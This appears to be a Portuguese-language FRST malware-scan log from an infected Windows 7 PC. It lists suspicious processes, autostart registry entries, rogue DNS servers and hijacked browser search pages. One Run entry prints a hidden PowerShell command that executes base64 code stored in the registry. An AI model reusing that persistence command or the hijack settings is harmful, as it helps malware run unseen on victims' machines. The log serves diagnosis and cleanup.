Resultado do exame da Farbar Recovery Scan Tool (FRST) (x86) Versão:05-03-2016 01 Executado por Cliente NS (administrador) em CLIENTENS-PC (17-03-2016 08:20:30) Executando a partir de C:\Users\Cliente NS\Downloads Perfis Carregados: Cliente NS (Perfis Disponíveis: Cliente NS) Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) Idioma: Português (Brasil) Internet Explorer Versão 11 (Navegador padrão: Opera) Modo da Inicialização: Normal Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processos (Whitelisted) ================= (Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.) (Elex do Brasil Participações Ltda) C:\Program Files\Elex-tech\YAC\iSafeSvc.exe (Elex do Brasil Participações Ltda) C:\Program Files\Elex-tech\YAC\iSafeSvc2.exe (Winzipper Pvt Ltd.) C:\Program Files\WinZipper\winzipersvc.exe (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe () C:\ProgramData\ApplicationHosting\ApplicationHosting.exe () C:\ProgramData\ApptnioPhtooteulB\ApptnioPhtooteulB.exe () C:\ProgramData\Ufksirnuxerip\1.0.1.0\liihessi.exe () C:\ProgramData\BluetoothPoint\BluetoothPoint.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe () C:\Program Files\Checker\check.exe (VLOME) C:\Users\Cliente NS\AppData\Local\Temp\is-40C13.tmp\print.exe () C:\Program Files\cqcontainerconlntrols\cqcontainerconlntrols.exe () C:\Program Files\Checker\packages\9e55d594-9f49-4595-90b4-858cd23e3dc9\amdide.exe () C:\ProgramData\Ufksirnuxerip\1.0.1.0\liihessi.exe () C:\Users\Cliente NS\AppData\Roaming\NetService\netservice.exe () C:\Program Files\CalendarTool\2.0.0.11189\CalendarServ.exe (TuneUp Software) C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesService32.exe () C:\Users\Cliente NS\AppData\Roaming\WinNetSvc\WinNetSvc.exe () C:\Program Files\CalendarTool\2.0.0.11189\calendar.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE () C:\ProgramData\Zitenop\Zitenop.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE () C:\Users\Cliente NS\AppData\Local\Temp\24771\Setup.exe (Green Fire Software) C:\ProgramData\ZVXGRAuNbf\sNqAOqZuj.exe (TuneUp Software) C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesApp32.exe () C:\Users\Cliente NS\AppData\Local\mbot_en_037050269\upmbot_en_037050269.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Wondershare) C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe () C:\Program Files\Unlocker\UnlockerAssistant.exe (Skillbrains) C:\Program Files\Skillbrains\lightshot\5.3.0.0\Lightshot.exe (Opera Software) C:\Program Files\Opera\launcher.exe () C:\Windows\Installer\{C3A3880E-9718-EB82-999F-D2E5786C4BB9}\syshost.exe () C:\Program Files\win_en_77\win_en_77.exe (Microsoft Corporation) C:\Windows\System32\msiexec.exe () C:\Program Files\mbot_en_037050269\mbot_en_037050269.exe () C:\ProgramData\zsqwv\zsqwv.exe (BitTorrent Inc.) C:\Users\Cliente NS\AppData\Roaming\BitTorrent\BitTorrent.exe (Valve Corporation) C:\Program Files\Steam\Steam.exe () C:\Users\Cliente NS\AppData\Local\Temp\carssn.exe () C:\ProgramData\WindowsMsg\osmsg.exe (BitTorrent Inc.) C:\Users\Cliente NS\AppData\Roaming\BitTorrent\updates\7.9.5_41866\utorrentie.exe (BitTorrent Inc.) C:\Users\Cliente NS\AppData\Roaming\BitTorrent\updates\7.9.5_41866\utorrentie.exe (Microsoft Corporation) C:\Windows\System32\cmd.exe () C:\ProgramData\Windows 7\Windows 7.exe () C:\Users\Cliente NS\AppData\Local\mbot_en_037050269\upmbot_en_037050269.exe (Goobzo LTD) C:\Program Files\YTAHelper\YTAHelper.exe (sdgshgdshg) C:\Users\Cliente NS\AppData\Local\mbot_en_037050269\Download\wizzupdater.exe () C:\Program Files\DNS Unlocker\dnscolfax.exe () C:\Program Files\mbot_en_037050269\mbot_en_037050269.exe (Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera_crashreporter.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe () C:\Program Files\mbot_en_037050269\mbot_en_037050269.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Skype Technologies S.A.) C:\Users\Cliente NS\AppData\Local\Setup Wizard\170bafd0-dec1-4559-a8df-04747b4a93c5\skypesetupfull.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera_crashreporter.exe (Uniblue Systems Ltd) C:\Program Files\Uniblue\DriverScanner\dsmonitor.exe () C:\Users\Cliente NS\AppData\Local\Temp\29278\Setup.exe () C:\Users\Cliente NS\AppData\Local\Setup Wizard\031630eb-e4f7-44c6-85a5-ac0458c38964\vlc-media-player.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera_crashreporter.exe () C:\Program Files\win_en_77\win_en_77.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe (Opera Software) C:\Program Files\Opera\35.0.2066.92\opera.exe ==================== Registro (Whitelisted) =========================== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [12017368 2013-10-24] (Realtek Semiconductor) HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2072928 2014-10-31] (Wondershare) HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [226560 2014-11-18] () HKLM\...\Run: [UnlockerAssistant] => C:\Program Files\Unlocker\UnlockerAssistant.exe [17408 2010-07-04] () HKLM\...\Run: [BlueStacks Agent] => C:\Program Files\BlueStacks\HD-Agent.exe HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2015-06-17] (Apple Inc.) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [157456 2015-09-23] (Apple Inc.) HKLM\...\Run: [mbot_br_003010037] => [X] HKLM\...\Run: [WinCheck] => C:\Users\Cliente NS\AppData\Local\032B0290-1437514782-05FE-1D06-100700080009\bnsa7429.exe HKLM\...\Run: [SpaceSoundPro] => "C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe" HKLM\...\Run: [gmsd_br_005010037] => [X] HKLM\...\Run: [ospd_us_013010037] => [X] HKLM\...\Run: [3D BubbleSound] => "C:\Program Files\BubbleSound\3D BubbleSound.exe" HKLM\...\Run: [Adobe ARM] => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" HKLM\...\Run: [D3DOverrider] => "C:\Users\Cliente NS\Pictures\D3DOverrider\D3DOverriderWrapper.exe" /s HKLM\...\Run: [DelaypluginInstall] => C:\ProgramData\Wondershare\Video Converter Ultimate\DelayPluginI.exe HKLM\...\Run: [syshost32] => C:\Windows\Installer\{C3A3880E-9718-EB82-999F-D2E5786C4BB9}\syshost.exe [160258 2016-02-23] () HKLM\...\Run: [LightGate] => C:\Users\Cliente NS\AppData\Local\Temp\LightGate.exe [1081344 2016-03-16] () <===== ATENÇÃO HKLM\...\Run: [apphide] => C:\Program Files\badu\uc.exe [217175 2016-03-15] () HKLM\...\Run: [pcmgr] => C:\Program Files\badu\Uninst.exe HKLM\...\Run: [SystemClose] => D:\Documents\systemfile.exe HKLM\...\Run: [win_en_77] => C:\Program Files\win_en_77\win_en_77.exe [3992792 2016-03-10] () HKLM\...\Run: [mbot_en_037050269] => C:\Program Files\mbot_en_037050269\mbot_en_037050269.exe [3966640 2016-03-16] () HKLM\...\Run: [sun3] => [X] HKLM\...\Run: [mpck_en_005030269] => [X] HKLM\...\Run: [rec_en_227] => [X] HKLM\...\Run: [sun21] => [X] HKLM\...\RunOnce: [WINDOWS_SCREEN_MANAGER_UPDATER] => C:\Program Files\Windows Screen Manager\Windows screen manage updater.exe [15360 2016-03-16] (Wizzservices) HKLM\...\RunOnce: [upmbot_en_037050269.exe] => C:\Users\Cliente NS\AppData\Local\mbot_en_037050269\upmbot_en_037050269.exe [3161776 2016-03-16] () HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe [152872 2007-06-27] (Nero AG) HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [GoogleDriveSync] => "C:\Program Files\Google\Drive\googledrivesync.exe" /autostart HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [MinhaBox.br] => C:\Program Files\Minhateca.com.br Box\MinhaBox.exe HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [amigo] => C:\Users\Cliente NS\AppData\Local\Amigo\Application\amigo.exe --no-startup-window HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [vpfaecysfz] => explorer "hxxp://opatolo.ru/?utm_source=uoua03n&utm_content=53ec9cba11c4c68db945b0faedd19cda&utm_term=A303D40284C212FCDFB1DD53FC8C53A3" <===== ATENÇÃO HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [BitTorrent] => C:\Users\Cliente NS\AppData\Roaming\BitTorrent\BitTorrent.exe [1930760 2016-03-04] (BitTorrent Inc.) HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [CrossBrowser] => "C:\Users\Cliente NS\AppData\Local\CrossBrowser\Application\crossbrowser.exe" HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3074128 2016-03-10] (Valve Corporation) HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [48145024 2015-10-14] (Skype Technologies S.A.) HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [{0D879DC9-E83E-49BE-8B04-A00CEC3B44E1}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\FNIARS').myRyvghGdEsU))); HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [Google Update] => C:\Users\Cliente NS\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2016-02-11] (Google Inc.) HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [syshost32] => C:\Users\Cliente NS\AppData\Local\{F53199AE-2E35-7F0A-7464-536953FC2A85}\syshost.exe HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [YeaInstaller] => C:\Users\Cliente NS\AppData\Local\Temp\ms9002.tmp.exe [1968128 2016-03-16] (TZ) <===== ATENÇÃO HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [msiql] => C:\Users\Cliente NS\AppData\Roaming\msiql.exe [1888256 2016-03-02] () HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [Yeaplayer] => C:\Program Files\Yeaplayer\Yeaplayermd.exe /autostart HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [-] => C:\Users\Cliente NS\AppData\Local\Temp\carssn.exe [2413056 2016-03-16] () <===== ATENÇÃO HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\osmsg.exe [2036224 2016-02-09] () HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [Pritc] => C:\Users\Cliente NS\AppData\Local\Temp\is-40C13.tmp\print.exe [2955264 2016-03-03] (VLOME) <===== ATENÇÃO HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [WindApp] => "C:\Users\Cliente NS\AppData\Roaming\Store\WindApp\WindApp.exe" /winstartup HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Run: [Selection Tools] => "C:\Users\Cliente NS\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\CurrentVersion\Windows: [Load] C:\ProgramData\msjoionn.exe <===== ATENÇÃO HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Policies\Explorer: [TaskbarNoNotification] 0 HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-18\...\RunOnce: [iCloud] => C:\Program Files\Common Files\Apple\Internet Services\iCloud.exe [43816 2015-04-26] (Apple Inc.) HKU\S-1-5-18\...\Policies\Explorer: [TaskbarNoNotification] 0 HKU\S-1-5-18\...\Policies\Explorer: [HideSCAHealth] 0 AppInit_DLLs: C:\ProgramData\Zitenop\Goldhome.dll => C:\ProgramData\Zitenop\Goldhome.dll [320512 2015-11-10] () ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Nenhum Arquivo ShellIconOverlayIdentifiers: [BaiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => Nenhum Arquivo Startup: C:\Users\Cliente NS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cliente NS.lnk [2016-03-11] ShortcutTarget: Cliente NS.lnk -> C:\ProgramData\zsqwv\zsqwv.exe () GroupPolicy: Restrição - Chrome <======= ATENÇÃO CHR HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\SOFTWARE\Policies\Google: Restrição <======= ATENÇÃO ==================== Internet (Whitelisted) ==================== (Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.) Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc.) Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt Tcpip\Parameters: [DhcpNameServer] 172.31.1.1 8.8.8.8 Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130 Tcpip\..\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{EE64FE5B-5714-4561-B338-D8DD06B11F9B}: [NameServer] 199.203.131.145,95.211.158.150 Tcpip\..\Interfaces\{EE64FE5B-5714-4561-B338-D8DD06B11F9B}: [DhcpNameServer] 172.31.1.1 8.8.8.8 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.123rede.com?oem=mbtkv6&uid=S1RLJ50SA65887_SAMSUNGHD322HJ&tm=1437525360 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.omniboxes.com/web/?type=ds&ts=1430938628&z=b1ee47b17ec5005c6b94b92g6z7cae6t0ceb2q0c4w&from=tti&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.123rede.com?oem=mbtkv6&uid=S1RLJ50SA65887_SAMSUNGHD322HJ&tm=1437525360 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.omniboxes.com/web/?type=ds&ts=1430938628&z=b1ee47b17ec5005c6b94b92g6z7cae6t0ceb2q0c4w&from=tti&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&q={searchTerms} HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=130893366584895706&GUID=E57FFB47-6005-4773-916B-F349745D8AC6 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.v9.com/?type=hp&ts=1444663956&from=mych123&uid=samsungxhd322hj_s1rlj50sa65887&z=da4f83776cde36f1f59115eg0z9zcz2q3qbc4tcq4e HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=130893366573975687&GUID=E57FFB47-6005-4773-916B-F349745D8AC6 HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.v9.com/?type=hp&ts=1444663956&from=mych123&uid=samsungxhd322hj_s1rlj50sa65887&z=da4f83776cde36f1f59115eg0z9zcz2q3qbc4tcq4e HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=130893366573975687&GUID=E57FFB47-6005-4773-916B-F349745D8AC6 HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.v9.com/?type=hp&ts=1444663956&from=mych123&uid=samsungxhd322hj_s1rlj50sa65887&z=da4f83776cde36f1f59115eg0z9zcz2q3qbc4tcq4e HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyudltbXijWF_47u4QsKZwceANvpk99IwpRxXiLQZCemT2GzsQ5ybfob_OMlMc7hVyB_XdSKnurY70Y96LQLpuD2f347sqXo4lFjg7UCCzNBcz_DVZftMspqdfuNIAL1OM3Tsff13PrNIJgcrQ,,&q={searchTerms} HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://opatolo.ru/?utm_content=83d5920a52d67260f4213f8bddf9126c&utm_source=startpm&utm_term=A303D40284C212FCDFB1DD53FC8C53A3 HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.123rede.com?oem=mbtkv6&uid=S1RLJ50SA65887_SAMSUNGHD322HJ&tm=1437525360 HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://search.delta-homes.com/web/?type=ds&ts=1432899296&z=1cf9c0a5a3e4b43b3f02166g8zccbo9b2t6t9c3e7m&from=wpm052932&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&q={searchTerms} HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyudltbXijWF_47u4QsKZwceANvpk99IwpRxXiLQZCemT2GzsQ5ybfob_OMlMc7hVyB_XdSKnurY70Y96LQLpuD2f347sqXo4lFjg7UCCzNBcz_DVZftMspqdfuNIAL1OM3Tsff13PrNIJgcrQ,,&q={searchTerms} HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyudltbXijWF_47u4QsKZwceANvpk99IwpRxXiLQZCemT2GzsQ5ybfob_OMlMc7hVyB_XdSKnurY70Y96LQLpuD2f347sqXo4lFjg7UCCzNBcz_DVZftMspqdfuNIAL1OM3Tsff13PrNIJgcrQ,,&q={searchTerms} SearchScopes: HKLM -> DefaultScope {ielnksrch} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfVgNBQlHEwASbQsNVgxcFQ0WJBRZUQlGDAAVdQsNUQgTRQVGJh9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWFML3JWDk4=&q={searchTerms} SearchScopes: HKLM -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyudltbXijWF_47u4QsKZwceANvpk99IwpRxXiLQZCemT2GzsQ5ybfob_OMlMc7hVyB_XdSKnurY70Y96LQLpuD2f347sqXo4lFjg7UCCzNBcz_DVZftMspqdfuNIAL1OM3Tsff13PrNIJgcrQ,,&q={searchTerms} SearchScopes: HKLM -> OldSearch URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfVgNBQlHEwASbQsNVgxcFQ0WJBRZUQlGDAAVdQsNUQgTRQVGJh9aFQQTSEcFME0FCFwEURNNfXRZD0AjREZWLE1LKUwT&q={searchTerms} SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1437526109&z=bde30cc1bc144125caa7701g9z9cfm1w7o4qbefb4e&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&q={searchTerms} SearchScopes: HKLM -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfVgNBQlHEwASbQsNVgxcFQ0WJBRZUQlGDAAVdQsNUQgTRQVGJh9aFQQTSEcFME0FCFwEURNNfXRZD0AjREZWLE1LKUwT&q={searchTerms} SearchScopes: HKLM -> {86c83f9e-48a4-4cd2-a763-64fea5df35f7} URL = hxxp://br.yhs4.search.yahoo.com/yhs/search?hspart=baixaki&hsimp=yhs-baixaki_br_installcore_01&type=p&p={searchTerms} SearchScopes: HKLM -> {BB82DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://websearch.hotsearches.info/?l=1&q={searchTerms}&pid=24390&r=2015/07/26&hid=13874718577857354569&lg=EN&cc=BR&unqvl=90 SearchScopes: HKLM -> {ielnksrch} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfVgNBQlHEwASbQsNVgxcFQ0WJBRZUQlGDAAVdQsNUQgTRQVGJh9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWFML3JWDk4=&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> DefaultScope {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> OldSearch URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {0EFC3541-6AC8-482A-B4A9-7A22A9DF5A4C} URL = hxxp://search.yahoo.com/yhs/search?hspart=ddc&hsimp=yhs-ddc_bd&type=bl-bir-dd__alt__ddc_dss_bd_com&p={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {12BF4D17-9ABE-4053-B436-4C94D58037FA} URL = hxxp://search.yahoo.com/yhs/search?hspart=ddc&hsimp=yhs-ddc_bd&type=bl-bir-dd__alt__ddc_dss_bd_com&p={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.yoursites123.com/web/?type=ds&ts=1449658697&z=1cfe1cc141f181087edb097gez9z4t7qfw6b9m4ebc&from=ient07021&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfVgNBQlHEwASbQsNVgxcFQ0WJBRZUQlGDAAVdQsNUQgTRQVGJh9aFQQTSEcFME0FCFwEURNNfXRZD0AjREZWLE1LKUwT&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {437C53B7-A39D-423E-8442-A323AE0F6732} URL = SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {460C3D19-B3D4-4964-A550-77D263B0CCCB} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {6C87262F-E77F-49C7-B597-0EF4B03FC7F4} URL = hxxp://search.yahoo.com/yhs/search?hspart=ddc&hsimp=yhs-ddc_bd&type=bl-bir-dd__alt__ddc_dss_bd_com&p={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {780ECC66-0557-46CD-A382-271EE4461161} URL = hxxp://search.yahoo.com/yhs/search?hspart=ddc&hsimp=yhs-ddc_bd&type=bl-bir-dd__alt__ddc_dss_bd_com&p={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {86c83f9e-48a4-4cd2-a763-64fea5df35f7} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {A33DB9FD-7A8A-496E-92D3-9CFCF9D9E1C9} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {B8336C76-56A0-4A1F-9CCE-90EE51356DD7} URL = hxxp://search.yahoo.com/yhs/search?hspart=ddc&hsimp=yhs-ddc_bd&type=bl-bir-dd__alt__ddc_dss_bd_com&p={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {BB82DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {D9E2F3D8-9ABE-48AE-B731-3861D8D6088B} URL = hxxp://search.yahoo.com/yhs/search?hspart=ddc&hsimp=yhs-ddc_bd&type=bl-bir-dd__alt__ddc_dss_bd_com&p={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {F7C78C08-3CC7-416F-B827-7C1785ABBDA8} URL = 